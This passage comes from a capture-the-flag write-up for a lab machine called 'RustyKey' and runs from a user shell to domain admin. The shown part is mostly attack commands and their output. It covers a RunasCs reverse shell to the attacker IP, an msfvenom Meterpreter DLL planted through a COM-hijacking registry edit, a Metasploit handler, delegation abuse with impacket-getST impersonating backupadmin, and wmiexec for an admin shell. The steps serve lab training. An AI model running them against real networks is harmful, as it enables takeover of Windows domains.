Info: Uploading /home/kali/Desktop/RustyKey/RunasCs.exe to C:\Tools\Run

asCs.exe

Data: 68948 bytes of 68948 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Tools> .\RunasCs.exe ee.reed P@ssword123 cmd.exe
-r 10.10.16.xx:4444
[*] Warning: User profile directory for user ee.reed does not exists. Use --f
orce-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combinatio
n --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW

()
[+] Using Station\Desktop: Service-0x0-238dff$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 5364 created
in background.

We now have a shell as user ee.reed

Week 7 : [ENG] RustyKey - Hard 28

 ㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.xx] from (UNKNOWN) [10.10.xx.xx] 56558
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
rustykey\ee.reed

C:\Windows\system32>cd C:/Tools
cd C:/Tools

7. Get Into mm.turner Session

We set up a DLL-based Meterpreter backdoor via a COM hijacking vulnerability

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.
xx LPORT=4444 -f dll -o rev.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows fr
om the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: rev.dll

Upload DLL (use bb.morgan evil-winrm shell)

*Evil-WinRM* PS C:\Tools> upload rev.dll

Info: Uploading /home/kali/Desktop/RustyKey/rev.dll to C:\Tools\rev.dll

Data: 12288 bytes of 12288 bytes copied

Week 7 : [ENG] RustyKey - Hard 29

 Info: Upload successful!

Prepare Handler in Metasploit

┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# msfconsole -q -x "use exploit/multi/handler; set payload windows/x6
4/meterpreter/reverse_tcp; set LHOST 10.10.16.xx; set LPORT 4444; exploi
t"

Perform registry manipulation

C:\Tools>dir
dir
Volume in drive C has no label.
Volume Serial Number is 00BA-0DBE

Directory of C:\Tools

06/30/2025 10:13 AM <DIR> .

06/30/2025 10:13 AM <DIR> ..
06/30/2025 10:13 AM 9,216 rev.dll
06/30/2025 10:09 AM 51,712 RunasCs.exe
2 File(s) 60,928 bytes
2 Dir(s) 2,940,559,360 bytes free

C:\Tools>reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-

1000-000100020000}\InprocServer32" /ve /d "C:\Tools\rev.dll" /f
reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000
100020000}\InprocServer32" /ve /d "C:\Tools\rev.dll" /f
The operation completed successfully.

After a few seconds we get a Revshell (We have to be quick, the connection
breaks very quickly) & set up delegation for our machine account - remember
switch from cmd to PowerShell session.

Week 7 : [ENG] RustyKey - Hard 30

 ┌──(root ㉿kali)-[/home/kali/Desktop/RustyKey]
└─# msfconsole -q -x "use exploit/multi/handler; set payload windows/x6
4/meterpreter/reverse_tcp; set LHOST 10.10.16.xx; set LPORT 4444; exploi
t"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
LHOST => 10.10.16.xx
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.xx:4444
[*] Sending stage (203846 bytes) to 10.10.xx.xx
[*] Meterpreter session 1 opened (10.10.16.xx:4444 -> 10.10.xx.xx:51084) at
2025-07-01 02:40:22 +0800

meterpreter > shell

Process 1172 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>Powershell
Powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows> Set-ADComputer -Identity DC -PrincipalsAllowedToDeleg

ateToAccount IT-COMPUTER3$
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-
COMPUTER3$
PS C:\Windows>

We can see MM.TURNER had AddAllowToAct privilege into DC.RUSTYKEY.HTB

Week 7 : [ENG] RustyKey - Hard 31

 8. Privilege Escalation
We impersonate the domain admin account via S4U2Self

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadm
in -dc-ip 10.10.xx.xx -k 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...

[*] Getting TGT for user
[*] Impersonating backupadmin
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWa
rning: datetime.datetime.utcnow() is deprecated and scheduled for remova
l in a future version. Use timezone-aware objects to represent datetimes in
UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWa

Week 7 : [ENG] RustyKey - Hard 32

 rning: datetime.datetime.utcnow() is deprecated and scheduled for remova
l in a future version. Use timezone-aware objects to represent datetimes in
UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWa
rning: datetime.datetime.utcnow() is deprecated and scheduled for remova
l in a future version. Use timezone-aware objects to represent datetimes in
UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWa
rning: datetime.datetime.utcnow() is deprecated and scheduled for remova
l in a future version. Use timezone-aware objects to represent datetimes in
UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@[email protected].
ccache

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYK
EY.HTB.ccache

Seem like we can use the ESC1 Technique for Alternative DCSync (Mimikatz).
But here i just run wmiexec.py to get a shell as NT/SYSTEM → Get the root flag

㉿
┌──(root kali)-[/home/kali/Desktop/RustyKey]
└─# /usr/share/doc/python3-impacket/examples/wmiexec.py -k -no-pass
'RUSTYKEY.HTB/[email protected]'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used

[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
rustykey\backupadmin

Week 7 : [ENG] RustyKey - Hard 33

 C:\>dir
Volume in drive C has no label.
Volume Serial Number is 00BA-0DBE

Directory of C:\

06/05/2025 07:54 AM <DIR> inetpub

11/05/2022 12:03 PM <DIR> PerfLogs
12/26/2024 09:24 PM <DIR> Program Files
09/15/2018 02:08 AM <DIR> Program Files (x86)
06/30/2025 11:46 AM <DIR> Tools
06/30/2025 11:09 AM <DIR> Users
06/30/2025 11:59 AM <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 2,935,005,184 bytes free

C:\>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 00BA-0DBE

Directory of C:\Users\Administrator\Desktop

06/24/2025 10:00 AM <DIR> .

06/24/2025 10:00 AM <DIR> ..
06/30/2025 10:53 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,935,820,288 bytes free

C:\Users\Administrator\Desktop>

Week 7 : [ENG] RustyKey - Hard 34